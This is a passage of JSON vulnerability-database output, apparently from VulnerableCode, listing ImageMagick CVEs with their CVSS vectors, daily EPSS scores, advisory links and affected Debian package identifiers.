"epss", "scoring_elements": "0.32418", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32467", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32494", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32497", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32459", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32432", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32468", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32446", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32417", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.0013", "scoring_system": "epss", "scoring_elements": "0.32245", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-20176" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20176", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20176" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916610", "reference_id": "1916610", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916610" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/5335-1/", "reference_id": "USN-5335-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5335-1/" }, { "reference_url": "https://usn.ubuntu.com/7164-1/", "reference_id": "USN-7164-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7164-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2021-20176" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hrrw-ufje-akg5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82024?format=api", "vulnerability_id": "VCID-hwcd-dj3f-guay", "summary": "ImageMagick: outside the range of representable values of type 'unsigned char' at coders/hdr.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27762.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27762.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27762", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30859", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30986", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.31033", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.3085", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30909", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30939", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30942", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30899", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30854", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30885", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30865", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30831", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30668", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27762" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27762", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27762" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894680", "reference_id": "1894680", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894680" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/5335-1/", "reference_id": "USN-5335-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5335-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27762" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hwcd-dj3f-guay" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82022?format=api", "vulnerability_id": "VCID-jpxf-qevp-kycp", "summary": "ImageMagick: division by zero in MagickCore/colorspace-private.h", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27750.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27750.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27750", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30859", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30986", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.31033", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.3085", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30909", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30939", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30942", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30899", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30854", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30885", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30865", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30831", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30668", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27750" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27750", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27750" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1891984", "reference_id": "1891984", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1891984" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/5335-1/", "reference_id": "USN-5335-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5335-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27750" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jpxf-qevp-kycp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82643?format=api", "vulnerability_id": "VCID-jqv2-v42r-7ybf", "summary": "ImageMagick: denial of service in ReadXWDImage in coders/xwd.c in the XWD image parsing component", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-11472.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-11472.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00396", "scoring_system": "epss", "scoring_elements": "0.603", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00396", "scoring_system": "epss", "scoring_elements": "0.60376", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00396", "scoring_system": "epss", "scoring_elements": "0.60403", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00396", "scoring_system": "epss", "scoring_elements": "0.6037", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00396", "scoring_system": "epss", "scoring_elements": "0.60419", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00396", "scoring_system": "epss", "scoring_elements": "0.60435", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00396", "scoring_system": "epss", "scoring_elements": "0.60456", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00396", "scoring_system": "epss", "scoring_elements": "0.60442", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00396", "scoring_system": "epss", "scoring_elements": "0.60422", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00396", "scoring_system": "epss", "scoring_elements": "0.60463", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00396", "scoring_system": "epss", "scoring_elements": "0.60471", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00396", "scoring_system": "epss", "scoring_elements": "0.60462", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00396", "scoring_system": "epss", "scoring_elements": "0.60446", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": 